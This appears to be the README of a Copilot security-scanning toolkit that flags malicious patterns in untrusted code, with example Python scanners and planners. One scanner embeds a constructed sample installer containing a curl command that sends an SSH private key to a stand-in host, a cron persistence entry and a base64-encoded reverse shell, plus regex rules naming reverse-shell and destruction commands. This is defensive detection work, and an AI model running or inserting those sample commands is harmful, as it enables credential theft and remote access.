Probably the most SKILLed security agent. Scan untrusted code for red flags before you run it—exfiltration, reverse shells, backdoors, and supply‑chain traps.

DevExpGbb/sec-check

Sec-Check

Scan untrusted code for red flags before you run it—exfiltration, reverse shells, backdoors, and supply‑chain traps.

A VS Code Copilot toolkit for scanning code for malicious patterns before running it locally.

What It Does

Sechek provides a custom Copilot agent and security scanning skills to detect dangerous patterns in code—credential theft, reverse shells, backdoors, and supply chain attacks. Use it to review scripts from the internet or untrusted sources before execution.

⚠️ Warning: This tool catches common red flags, not sophisticated attacks. Always use manual review and sandboxing for high-risk code.


View results of a full scan here


Components

🤖 Custom Agent

@sechek.security-scanner — Malicious Code Scanner Agent

Deep security analysis with pattern detection and remediation guidance. Detects:

  • Data exfiltration and credential theft
  • Reverse shells and backdoors
  • Persistence mechanisms (cron, registry)
  • Obfuscated payloads (base64, eval)
  • System destruction patterns

The agent can work standalone, relying on its own pattern matching, or, when they are installed, drive the external scanners (Bandit, GuardDog, ShellCheck, Graudit) and fold their output into its analysis.
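To make the detection categories above concrete, here is a small Python scanner written for this page (it is an added example, not the sec-check agent's own logic; the rules, the base64 unwrapping step and the sample installer script are all constructed). It applies one regex rule per category to each line, then decodes any long base64-looking token and rescans the decoded text, which is what surfaces a reverse shell that a plain grep for /dev/tcp would miss:

```python
"""Red-flag scanner in the spirit of sec-check's pattern detection.

Added example for this page, not the project's code. RULES, the base64
unwrapping layer and SAMPLE_SCRIPT are all constructed for illustration.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# (category, severity, pattern). Constructed rules; real scanners carry far more.
RULES = [
    ("reverse-shell", "critical", re.compile(
        r"/dev/tcp/|\bnc\b[^\n]*\s-e\s|\bncat\b[^\n]*--exec|\bmkfifo\b[^\n]*\bnc\b|\bpty\.spawn\(")),
    ("exfiltration", "high", re.compile(
        r"\b(?:curl|wget)\b[^\n]*(?:\s-d\s|--data\b|--upload-file\b|\s-T\s|\.ssh/|\.aws/"
        r"|\$\{?\w*(?:TOKEN|KEY|SECRET|PASSW)\w*)")),
    ("persistence", "high", re.compile(
        r"\bcrontab\s+-|/etc/cron\.|\breg(?:\.exe)?\s+add\b[^\n]*\\Run(?:Once)?\b"
        r"|>>\s*\S*\.(?:bashrc|profile|zshrc)\b|\bsystemctl\s+enable\b")),
    ("obfuscation", "medium", re.compile(
        r"\b(?:eval|exec)\s*\(|\bbase64\s+(?:-d|--decode)\b|\bb64decode\(|\bxxd\s+-r\b|\bmarshal\.loads\(")),
    ("destruction", "critical", re.compile(
        r"\brm\s+-[A-Za-z]*r[A-Za-z]*\s+/(?:\s|$|\*)|\bmkfs\.\w+|\bdd\s+if=\S+\s+of=/dev/(?:sd|nvme|hd)|\bshred\b")),
]

# Long base64-looking tokens that may hide a second-stage payload.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


@dataclass(frozen=True)
class Finding:
    line: int
    category: str
    severity: str
    layer: str      # "raw" for the line as written, "decoded" for unwrapped base64
    evidence: str


def _apply_rules(text: str, lineno: int, layer: str) -> List[Finding]:
    hits = []
    for category, severity, pattern in RULES:
        m = pattern.search(text)
        if m:
            hits.append(Finding(lineno, category, severity, layer, m.group(0)[:60]))
    return hits


def decode_base64_text(token: str) -> Optional[str]:
    """Return the decoded text if token is valid base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:          # binascii.Error is a ValueError: bad alphabet or padding
        return None
    if not raw.isascii():
        return None
    text = raw.decode("ascii")
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def scan_text(text: str) -> List[Finding]:
    """Scan each line with the rules, then unwrap one layer of base64 and rescan that."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        findings.extend(_apply_rules(line, lineno, "raw"))
        for token in B64_TOKEN.findall(line):
            decoded = decode_base64_text(token)
            if decoded:
                findings.extend(_apply_rules(decoded, lineno, "decoded"))
    return findings


# Constructed sample: a bash "installer" as one might paste from a forum post.
# The reverse shell is hidden behind base64 so a plain grep for /dev/tcp misses it.
PAYLOAD_B64 = base64.b64encode(b"bash -i >& /dev/tcp/203.0.113.5/4444 0>&1").decode()
SAMPLE_SCRIPT = f"""#!/bin/bash
# one-line installer (constructed sample)
set -e
pip install requests
curl -s -d @$HOME/.ssh/id_rsa https://collect.example.net/u
echo "* * * * * /tmp/.x" | crontab -
echo {PAYLOAD_B64} | base64 -d | bash
rm -rf /tmp/build
"""

if __name__ == "__main__":
    for f in sorted(scan_text(SAMPLE_SCRIPT), key=lambda f: (f.line, f.category)):
        print(f"line {f.line:>2} [{f.severity:<8}] {f.category:<13} ({f.layer}) {f.evidence!r}")
```

Run directly, it reports line 5 (SSH key pushed out with curl), line 6 (cron persistence) and line 7 twice, once as obfuscation on the raw line and once as a reverse shell in the decoded layer, while the benign rm -rf /tmp/build on line 8 is not flagged. The unwrapping is one layer deep: anything hidden behind gzip, XOR or string concatenation stays invisible, which is exactly the limitation the README states about pattern-based detection.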


🔧 Security Skills

Skills teach Copilot how to use specific security tools:

| Skill | Purpose | Use For |
|---|---|---|
| bandit-security-scan | Python AST-based security analysis | Python code vulnerabilities, dangerous functions (eval, exec, pickle), SQL injection |
| guarddog-security-scan | Supply chain & malware detection | Dependencies (requirements.txt, package.json), typosquatting, malicious packages |
| shellcheck-security-scan | Shell script static analysis | Bash/sh scripts, command injection, unquoted variables |
| graudit-security-scan | Multi-language pattern matching | Quick scans on unknown codebases, secrets detection, 15+ languages |
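As an added example of what a supply-chain check on a dependency manifest looks for (this is code written for this page, not the guarddog-security-scan skill or GuardDog itself; the POPULAR allowlist and the sample requirements.txt are constructed), the following Python script parses requirements.txt lines and flags custom package indexes, non-registry sources, unpinned popular packages, and typosquat candidates one edit or transposition away from a popular name:

```python
"""Dependency-manifest checks in the spirit of the supply-chain skill.

Added example for this page, not the project's or GuardDog's code. The
POPULAR allowlist and SAMPLE_REQUIREMENTS are constructed for illustration.
"""
import re
from typing import List, Tuple

# Constructed stand-in for a "most-downloaded packages" list used as typosquat targets.
POPULAR = {"requests", "urllib3", "numpy", "pandas", "flask", "django",
           "cryptography", "pyyaml", "boto3", "pillow", "setuptools"}

# name [extras] operator version   (a minimal subset of the requirement grammar)
REQ_LINE = re.compile(
    r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(?:\[[^\]]*\])?\s*(==|>=|<=|~=|!=|>|<)?\s*([^\s;]*)")


def normalize(name: str) -> str:
    """PEP 503 name normalization: case-insensitive, runs of - _ . collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a: str, b: str) -> int:
    """Optimal-string-alignment distance: edits plus adjacent transpositions (reqeusts ~ requests)."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def check_requirements(text: str) -> List[Tuple[int, str, str]]:
    """Return (line, category, detail) for supply-chain red flags in a requirements.txt."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith(("--index-url", "-i ", "--extra-index-url", "--find-links", "-f ")):
            findings.append((lineno, "custom-index", line))        # resolver pointed away from PyPI
            continue
        if line.startswith("-"):
            continue                                               # other pip options, e.g. -r
        if "://" in line or line.startswith(("git+", ".", "/")):
            findings.append((lineno, "non-registry-source", line))  # URL, VCS or local path
            continue
        m = REQ_LINE.match(line)
        if not m:
            findings.append((lineno, "unparseable", line))
            continue
        name, op = normalize(m.group(1)), m.group(2)
        if name in POPULAR:
            if op != "==":
                findings.append((lineno, "unpinned", name))        # floating version, no exact pin
            continue
        if len(name) >= 4:                                         # short names give too much noise
            for target in sorted(POPULAR):
                if osa_distance(name, target) == 1:
                    findings.append((lineno, "typosquat", f"{name} ~ {target}"))
    return findings


# Constructed sample manifest.
SAMPLE_REQUIREMENTS = """\
--index-url https://pypi.example.org/simple
requests==2.31.0
reqeusts==2.31.0
numpy
pandas>=2.0
git+https://git.example.org/acme/utils.git@main
colorama==0.4.6
"""

if __name__ == "__main__":
    for lineno, category, detail in check_requirements(SAMPLE_REQUIREMENTS):
        print(f"line {lineno}: {category:<20} {detail}")
```

On the sample manifest it reports the custom --index-url (line 1), reqeusts as a typosquat of requests (line 3), numpy and pandas>=2.0 as unpinned (lines 4 and 5), and the git+ source (line 6); colorama, which is simply absent from the small allowlist, produces nothing. Name heuristics like these are only a first pass: a real check compares against a full registry snapshot and inspects the package contents, which is the part the GuardDog skill is for.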

📝 Custom Prompts

| Prompt | When to Use |
|---|---|
| /sechek.tools-advisor | Get recommendations on which tools to run based on your codebase |
| /sechek.tools-scan | Execute security tools and save results to tools-audit.md |
| /sechek.security-scan | Full workspace scan with the security scanner agent |
| /sechek.security-scan-quick | Fast scan for malicious patterns, exfiltration, reverse shells |
| /sechek.security-scan-python | Python-focused scan using Bandit and GuardDog |
| /sechek.security-scan-shell | Shell script scan using ShellCheck and Graudit |
| /sechek.security-scan-supply-chain | Scan dependencies for supply chain attacks |
| /sechek.security-scan-precommit | Pre-commit check for secrets and vulnerabilities |
| /sechek.plan-fix | Generate a prioritized remediation plan from scan results |
| /create-security-skill | Create a new security scanning skill from tool documentation |

Security Remediation Planning

After running security scans, use /sechek.plan-fix to generate a detailed remediation plan with prioritized tasks, timelines, and fix patterns.

View a sample remediation plan here

The plan includes:

  • Prioritized tasks grouped by severity (Critical → High → Medium → Low)
  • SLA timelines (24 hours for Critical, 1 week for High, etc.)
  • Fix patterns with vulnerable vs. secure code examples
  • Parallel execution opportunities to speed up remediation
  • Verification commands to confirm fixes
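As an added illustration of the plan structure listed above (example code for this page, not the /sechek.plan-fix prompt's own output; the Medium and Low SLAs, the batching rule and the sample findings are constructed), the following Python planner folds duplicate findings into one task per file and rule, orders tasks by severity, attaches an SLA due date computed from the scan time, and assigns batch numbers so that tasks in different files can be fixed in parallel while two tasks in the same file are serialized:

```python
"""Remediation planner in the spirit of /sechek.plan-fix.

Added example for this page, not the project's code. The SLA values beyond
Critical and High, the batching rule and SAMPLE_FINDINGS are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Tuple

SEVERITY_ORDER = ["critical", "high", "medium", "low"]
# 24 hours for Critical and 1 week for High follow the README; Medium and Low are assumed values.
SLA = {"critical": timedelta(hours=24), "high": timedelta(weeks=1),
       "medium": timedelta(weeks=4), "low": timedelta(weeks=12)}


@dataclass(frozen=True)
class Finding:
    file: str
    line: int
    rule: str
    severity: str


@dataclass(frozen=True)
class Task:
    priority: int            # 1 = fix first
    severity: str
    file: str
    rule: str
    lines: Tuple[int, ...]   # every occurrence of the rule in this file, folded into one task
    due: datetime
    batch: int               # tasks sharing a batch touch different files and can run in parallel


def build_plan(findings: Iterable[Finding], scanned_at: datetime) -> List[Task]:
    # 1. Fold duplicate (file, rule) hits into one task so a fix pattern is applied once per file.
    grouped: Dict[Tuple[str, str, str], List[int]] = defaultdict(list)
    for f in findings:
        if f.severity not in SLA:
            raise ValueError(f"unknown severity {f.severity!r} in {f.file}:{f.line}")
        grouped[(f.file, f.rule, f.severity)].append(f.line)

    tasks: List[Task] = []
    next_batch = 0
    # 2. Walk severity tiers in order; every batch of a tier comes before the next tier's batches.
    for severity in SEVERITY_ORDER:
        tier = sorted(k for k in grouped if k[2] == severity)
        if not tier:
            continue
        per_file_count: Dict[str, int] = defaultdict(int)
        tier_width = 0
        for file, rule, _ in tier:
            # 3. Two tasks in the same file are serialized (they would edit the same code);
            #    tasks in different files share a batch and can be worked in parallel.
            batch = next_batch + per_file_count[file]
            per_file_count[file] += 1
            tier_width = max(tier_width, per_file_count[file])
            tasks.append(Task(len(tasks) + 1, severity, file, rule,
                              tuple(sorted(grouped[(file, rule, severity)])),
                              scanned_at + SLA[severity], batch))
        next_batch += tier_width
    return tasks


def render_plan(tasks: List[Task]) -> str:
    """Markdown in the shape of a plan-fix report: one section per severity, one checkbox per task."""
    out: List[str] = []
    for severity in SEVERITY_ORDER:
        rows = [t for t in tasks if t.severity == severity]
        if rows:
            out.append(f"## {severity.title()} (due by {rows[0].due:%Y-%m-%d %H:%M})")
            out.extend(f"- [ ] #{t.priority} {t.file}: {t.rule} at lines "
                       f"{', '.join(map(str, t.lines))} (batch {t.batch})" for t in rows)
    return "\n".join(out)


# Constructed scan output and scan timestamp.
SCANNED_AT = datetime(2025, 1, 6, 9, 0)
SAMPLE_FINDINGS = [
    Finding("install.sh", 7, "reverse-shell", "critical"),
    Finding("install.sh", 5, "exfiltration", "high"),
    Finding("install.sh", 9, "exfiltration", "high"),
    Finding("app/db.py", 42, "sql-injection", "high"),
    Finding("app/db.py", 88, "sql-injection", "high"),
    Finding("app/db.py", 60, "pickle-load", "high"),
    Finding("app/util.py", 12, "eval-use", "medium"),
    Finding("setup.py", 3, "hardcoded-secret", "critical"),
]

if __name__ == "__main__":
    print(render_plan(build_plan(SAMPLE_FINDINGS, SCANNED_AT)))
```

For the sample findings the two critical tasks land in batch 0, the three high tasks in batches 1 and 2 (the two app/db.py tasks are serialized, the install.sh task runs alongside the first of them), and the medium task in batch 3; the rendered Markdown groups them under one heading per severity with that tier's due date.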

Quick Start

Option 1: Full Scan

/sechek.security-scan

Runs comprehensive analysis using available tools and pattern detection.

Option 2: Targeted Scans

/sechek.security-scan-python       # Python code
/sechek.security-scan-shell        # Shell scripts
/sechek.security-scan-supply-chain # Dependencies

Option 3: Tool Workflow

/sechek.tools-advisor              # Get tool recommendations
/sechek.tools-scan ./src           # Run recommended tools
@sechek.security-scanner           # Deep analysis with tool output

Output

| File | Generated By | Contents |
|---|---|---|
| .github/.audit/tools-audit.md | /sechek.tools-scan | Raw tool output |
| .github/.audit/scan-results.md | @sechek.security-scanner | Analysis with findings & remediation |

Repository Structure

.github/
├── agents/
│   └── sechek.malicious-code-scanner.agent.md  # Security scanner agent
├── skills/
│   ├── bandit-security-scan/                   # Python security
│   ├── guarddog-security-scan/                 # Supply chain
│   ├── shellcheck-security-scan/               # Shell scripts
│   └── graudit-security-scan/                  # Multi-language
├── prompts/                                    # Custom prompts
└── .context/                                   # Attack patterns reference
research/
└── techniques/                                 # Security research notes

Limitations

  • Pattern-based detection only—may miss obfuscated or novel attacks
  • No guarantee of safety—use as first-pass filter, not final decision
  • Requires manual review for context-dependent vulnerabilities

For production or high-security environments, combine with professional security audits and isolated testing.
